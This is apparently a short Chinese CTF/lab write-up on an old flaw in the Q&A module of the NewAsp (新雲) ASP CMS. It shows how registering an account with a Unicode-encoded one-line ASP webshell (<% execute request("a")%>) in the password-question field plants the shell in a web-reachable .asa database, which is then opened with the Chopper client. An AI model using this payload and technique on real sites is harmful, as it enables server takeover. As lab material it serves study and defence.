CMS系統漏洞分析溯源(第3題)
阿新 • • 發佈:2018-12-18
新雲網站內容管理系統是一套開源的WEB網站管理系統,採用目前非常成熟的ASP+Access/SQL開發而成。使用它,我們可以很方便的管理自己的網站,目前新雲網站內容管理系統最新的版本是v4.0.0 SP2。本文要介紹的捕洞就出在新雲網站內容管理系統v4.0.0 SP1以及未打官方最新補丁的v4.0.O SP2的問吧系統中。
新雲的問吧是類似百度知道的互動知識問答分享平臺,問吧採用自己的資料庫,資料庫檔案為.asa格式,由於過濾不嚴,導致可以向資料庫中插入一句話木馬,從而拿到webshell。
題目給出提示得到
自然,註冊賬戶
但“密碼問題”需要特別注意,要填寫 ┼攠數畣整爠煥敵瑳∨≡┩愾
也就是<% execute request("a")%>a經過Unicode轉碼後的程式碼。
註冊資訊全部填寫完畢後點“立即註冊”按鈕,註冊成功後我們的一句話木馬就插入到資料庫中了
問吧資料庫的預設地址是問吧耳錄下的data目錄下的ask_newasp.asa,直接在瀏覽器中訪問,看到了資料庫的程式碼,拉到網頁最下面,看到了熟悉的“型別不匹配:'execute'”,說明一句話木馬已經成功的插入到資料庫中了。
菜刀連線
Done